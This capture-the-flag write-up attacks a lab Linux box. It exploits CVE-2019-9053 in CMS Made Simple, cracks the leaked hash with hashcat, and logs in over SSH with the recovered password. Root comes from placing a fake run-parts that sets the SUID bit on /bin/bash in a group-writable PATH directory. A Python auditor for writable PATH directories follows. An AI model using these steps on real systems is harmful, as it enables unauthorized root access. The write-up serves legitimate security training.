This article describes how CVE-2019-9053 is exploited on a Linux target during a penetration test. First, an Nmap scan gathers information about the host, including the open SSH and HTTP ports. Next, visiting the web interface and robots.txt reveals the CMS in use. After the vulnerability yields user credentials, we log in successfully over SSH. Then, by checking permissions, we find that path hijacking can be used for privilege escalation, and we finally obtain root. The article closes with the lessons learned along the way.

Information Gathering

# Nmap 7.98 scan initiated Mon Dec 29 13:52:07 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.379 days (since Wed Dec 24 04:47:57 2025)
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 29 13:53:46 2025 -- 1 IP address (1 host up) scanned in 99.57 seconds

Vulnerability Analysis

Visiting the web site, then checking robots.txt, and finally browsing to http://writeup.htb/writeup/ reveals that it runs CMS Made Simple - Copyright (C) 2004-2019. All rights reserved. Searching for CMS Made Simple 2019 turns up CVE-2019-9053.

Exploitation (User Flag)

After running it, we get:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
➜  Writeup echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
->raykayjay9

Run ssh jkr@writeup.htb and enter raykayjay9 to log in.

Privilege Escalation (Root Flag)

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

Membership of the staff group means full permissions over /usr/local.

jkr@writeup:~$ ls -ld /usr/local/bin
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin

Run pspy.

# At first I did not find anything, but when we ssh into the target we can see
2025/12/31 01:34:45 CMD: UID=0     PID=2265   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2025/12/31 01:34:45 CMD: UID=0     PID=2266   | run-parts --lsbsysinit /etc/update-motd.d

run-parts is looked up through PATH rather than by absolute path, so path hijacking is possible.

jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

Now reconnect to the target to trigger our payload.

➜  Writeup ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15  2017 /bin/bash
-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) euid=0(root) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
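
As an added defensive check, not part of the original writeup, the script below audits the condition that made this escalation possible: given the PATH a root-run job uses and the commands it resolves by name, it reports every directory searched no later than the one holding the real binary that an unprivileged user (directly or through a group such as staff) could write into, and it generalises to any PATH and command list. The demo() layout, the fake uid and the simulated group membership are constructed for illustration.

```python
import os
import stat
import tempfile

def writable_by(st, uid, gids):
    """Can a user with this uid and group set write into the entry described by st?"""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def path_hijack_risks(path_value, commands, uid, gids):
    """For each command resolved through PATH, list the directories searched up to and
    including the one holding the real binary that uid/gids could write into: an earlier
    writable directory lets that user shadow the command; a writable home lets them replace it."""
    dirs = path_value.split(":")
    findings = []
    for cmd in commands:
        real_index = next((i for i, d in enumerate(dirs)
                           if os.path.isfile(os.path.join(d, cmd))
                           and os.access(os.path.join(d, cmd), os.X_OK)), None)
        searched = dirs if real_index is None else dirs[: real_index + 1]
        for d in searched:
            try:
                st = os.stat(d)
            except OSError:
                continue  # directory absent: nothing to write into
            if writable_by(st, uid, gids):
                findings.append((cmd, d))
    return findings

def demo():
    """Constructed layout mirroring the box: group-writable usr/local/bin listed before the bin holding run-parts."""
    with tempfile.TemporaryDirectory() as base:
        local_bin, system_bin = os.path.join(base, "usr", "local", "bin"), os.path.join(base, "bin")
        for d, mode in ((local_bin, 0o775), (system_bin, 0o755)):  # group write only on local_bin
            os.makedirs(d)
            os.chmod(d, mode)  # the real box's directory also carried setgid; irrelevant to this check
        real = os.path.join(system_bin, "run-parts")
        open(real, "w").close()
        os.chmod(real, 0o755)  # an empty executable file is enough for the PATH lookup
        fake_uid = os.getuid() + 1          # an unprivileged user who does not own the directories...
        gids = {os.stat(local_bin).st_gid}  # ...but belongs to their group (think 'staff')
        findings = path_hijack_risks(local_bin + ":" + system_bin, ["run-parts"], fake_uid, gids)
        return [(cmd, os.path.relpath(d, base)) for cmd, d in findings]
```

Run the same function against the real PATH from the pspy line (/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin) with the uid and groups of an ordinary account to see which directories a root cron or MOTD job would trust too much.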

Lessons Learned